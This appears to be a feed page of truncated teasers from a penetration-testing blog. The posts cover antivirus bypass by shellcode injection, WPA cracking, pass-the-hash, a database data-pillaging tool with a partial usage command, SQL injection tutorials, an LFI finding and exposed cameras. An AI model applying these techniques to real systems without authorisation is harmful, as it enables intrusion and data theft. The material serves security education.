Bypassing AntiVirus With Process Injection
There is a new tool for anti virus bypass which allows an attacker to inject shellcode into a process Post exploitation. Enabling the attacker to pass a shell to a remote location, generally i assume...
View ArticleOpen LockSport Donations
A slight divergence from the technical for a moment, everyone should go check out a cool new line of custom lock-picking tools that will be coming out shortly. Pre-Order yours by providing a donation...
View ArticleBlast From The Past
Recently on a test I ran into a windows 2000 server running iis5 with the Internet Printing module enabled, I was quite surprised by this but...a shell is a shell right? Since this was on the job and I...
View ArticleSetting up Pyrit on OSX with CUDA Support
A quick guide on getting pyrit installed and working on OSX with gpu (CUDA) support.First you need to download and install CUDA drivers and CUDA SDK from nvidia.Drivers...
View ArticleWPA JTR/Pyrit/cowpatty uses and cracking interoperability
@font-face { font-family: "Wingdings"; }@font-face { font-family: "Cambria"; }p.MsoNormal, li.MsoNormal, div.MsoNormal { margin: 0in 0in 10pt; font-size: 12pt; font-family: "Times New Roman";...
View ArticleClik here to view.
OpenDLP Pass-The-Hash
OpenDLP is a great time saving tool when looking for sensitive data on windows machines but one pain with using it is that it requires a username and password for the target machine. Passwords are not...
View ArticleThe Database Pillager (tool release)
p { margin-bottom: 0.08in; }a:link { } The Database Pillager(Usage Tutorial, Tool Release 0.1)I coded up a Database Pillaging tool for multiple database types which can be downloaded below I would host...
View ArticleDbPillage Release 0.3
Database Pillager Release 0.3 (Couple New features and updates) Quick announcement on the Database Pillager tool. I have added in new features and updated many things... Below is some info and an...
View ArticleImmunity Canvas Code and CMDLine Walkthrough
This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down...
View ArticleWeb Hacking Video Series #1 Automating SQLi with Burp Extractor
Why:After speaking with many penetration testers I have realized that web application hacking is a mystery for many testers who typically perform network based penetration testing but have no prior...
View ArticleWeb Hacking Video Series #2 Analysis of application behavior to bypass common...
. Video Lesson Topics: (Running time 50+ minutes)This lesson covers the following topics:Analysis of application behavior to bypass common implementation issuesWriting custom python code to deal with...
View ArticleBurp Intruder Time fields
This is an update from the last video blog: I had a update submission from Toxic after watching Web Application video #2. Although module 4 was to learn how to code custom situations... Toxic noted...
View ArticleDataBase Pillager 0.5 Release (Video) Targeted data searches
Updated Link + Features 9/27/2011 after this initial post (New Query-Cmd Line "-q" to drop you into a sql shell and data formatting on display) Example: python dbpillage.py -a 127.0.0.1 -d mysql -u...
View ArticleWeb Hacking Video Series #3 MySQL Part 1 (SQL Primer)
Video Lesson Topics:Creating a SQL-cmdShell in pythonSetting up a SQL lab/learning environmentLearning basic SQL queriesMore advanced queries for pulling meaningful dataInteracting with the operating...
View ArticleWeb Hacking Video Series #4 MySQL Part 2 (Injection and Coding)
Video Lesson Topics:Setting up your victim application, databases and labAttacking a simple injection with information SchemaAutomating your injections with python and beautiful soupDealing with...
View ArticleClik here to view.
Ganglia Monitoring System LFI
Awhile back when doing a pentest I ran into an interesting web application on a server that was acting as a gateway into a juicy environment *cough*pci*cough*, the application was “Ganglia Monitoring...
View ArticleClik here to view.
Trendnet Cameras - I always feel like somebody's watching me.
Firstly this post requires the following song to be playing.http://www.youtube.com/watch?v=wVfjwIyc-CUNow that we got that out of the way... I have been seeing posts on sites with people having fun...
View ArticleBit Banging your Database
This post will be about stealing data from a database one bit at a time. Most of the time pulling data from a database a bit at a time would not be ideal or desirable, but in certain cases it will work...
View ArticleWireless Scenarios Part 1: EAP-Radius JTR Hashcat, SSID MAC issues and more
Intro: I have been on a number of wireless engagements again lately and much like the wireless blog i wrote over a year ago i am trying various combinations of techniques and tools in conjunction to...
View ArticleSocial Engineering Pentest Professional(SEPP) Training Review
Intro:I recently returned from the new Social Engineering training provided by Social-Engineer.org in the beautiful city of Seattle,WA, a state known for sparkly vampires, music and coffee shop...
View Article